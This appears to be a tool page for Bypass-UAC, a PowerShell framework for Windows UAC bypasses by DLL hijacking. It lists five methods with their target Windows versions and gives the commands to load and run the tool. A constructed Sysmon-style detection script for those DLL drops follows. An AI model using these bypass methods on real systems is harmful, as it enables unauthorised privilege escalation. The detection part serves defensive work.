# Bypass-UAC

Bypass-UAC provides a framework to perform UAC bypasses based on auto-elevating IFileOperation COM object method calls. This is not a new technique; traditionally, it is accomplished by injecting a DLL into "explorer.exe". That approach is not desirable because injecting into explorer may trigger security alerts, and working with unmanaged DLLs makes for an inflexible workflow.

Link: <https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC>

## Usage

Bypass-UAC is self-contained and does not have any dependencies, bar a requirement that the target have PowerShell v2.

Methods:

```
* UacMethodSysprep: Original technique by Leo Davidson (sysprep -> cryptbase.dll) 
  * Targets: x32/x64 Windows 7 & 8 
* ucmDismMethod: Hybrid method (PkgMgr -> DISM -> dismcore.dll) 
  * Targets: x64 Win7+ (currently unpatched) 
* UacMethodMMC2: Hybrid method (mmc -> rsop.msc -> wbemcomn.dll) 
  * Targets: x64 Win7+ (currently unpatched) 
* UacMethodTcmsetup: Hybrid method (tcmsetup -> tcmsetup.exe.local -> comctl32.dll) 
  * Targets: x32/x64 Win7+ (UAC "0day" ¯\_(ツ)_/¯) 
* UacMethodNetOle32: Hybrid method (mmc some.msc -> Microsoft.NET\Framework[64]\..\ole32.dll) 
  * Targets: x32/x64 Win7+ (UAC "0day" ¯\_(ツ)_/¯) 
```

Run:

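```
# Load the script as a module...
Import-Module .\Bypass-UAC.ps1
# ...or dot-source it into the current session
. .\Bypass-UAC.ps1
# Then run the chosen method
Bypass-UAC -Method UacMethodSysprep
```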

Win10 Example

<img src="https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M4xwp6Mq18nX8yR4M5z%2Fuploads%2F4ygWVJL8coewhEP6DqiI%2Ffile.png?alt=media" alt="UacMethodTcmsetup" data-size="original">
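
An added detection example, not part of Bypass-UAC or the original page: it filters file-creation records shaped like Sysmon Event ID 11 (fields `Image`, `TargetFilename`) for the DLL names in the method list above landing outside their usual directories. The function name, the expected-directory table and the sample events are assumptions constructed for illustration.

```powershell
# Constructed example. DLL names are taken from the method list on this page;
# the "normal" directories (relative to %SystemRoot%) are assumptions about a
# default install and should be tuned against your own baseline.
$ExpectedDirs = @{
    'cryptbase.dll' = @('System32', 'SysWOW64')
    'dismcore.dll'  = @('System32\Dism', 'SysWOW64\Dism')
    'wbemcomn.dll'  = @('System32', 'SysWOW64')
    'comctl32.dll'  = @('System32', 'SysWOW64')
    'ole32.dll'     = @('System32', 'SysWOW64')
}

function Find-SuspectDllDrop {
    param(
        [Parameter(Mandatory = $true)] [object[]] $Events,
        [string] $SystemRoot = 'C:\Windows'
    )
    $root = $SystemRoot.TrimEnd('\') + '\'
    foreach ($e in $Events) {
        $path = [string]$e.TargetFilename
        $name = ($path -split '\\')[-1].ToLowerInvariant()
        # Only the DLL names listed on this page are of interest.
        if (-not $ExpectedDirs.ContainsKey($name)) { continue }
        # Only writes below the Windows directory are of interest.
        if (-not $path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) { continue }
        # Directory of the new file, relative to %SystemRoot%.
        $dir = $path.Substring($root.Length, $path.Length - $root.Length - $name.Length).TrimEnd('\')
        # Servicing legitimately writes side-by-side copies under WinSxS.
        if ($dir -like 'WinSxS\*') { continue }
        # -contains compares strings case-insensitively.
        if ($ExpectedDirs[$name] -contains $dir) { continue }
        [pscustomobject]@{ Dll = $name; Directory = $dir; Image = $e.Image }
    }
}

# Constructed sample events (not real telemetry).
$sample = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\dllhost.exe'
                       TargetFilename = 'C:\Windows\System32\sysprep\cryptbase.dll' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\dllhost.exe'
                       TargetFilename = 'C:\Windows\System32\tcmsetup.exe.local\constructed-assembly-dir\comctl32.dll' }
    [pscustomobject]@{ Image = 'C:\Windows\servicing\TrustedInstaller.exe'
                       TargetFilename = 'C:\Windows\WinSxS\constructed-assembly-dir\comctl32.dll' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\notepad.exe'
                       TargetFilename = 'C:\Users\constructed\Documents\notes.txt' }
)

Find-SuspectDllDrop -Events $sample | Format-Table -AutoSize
```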
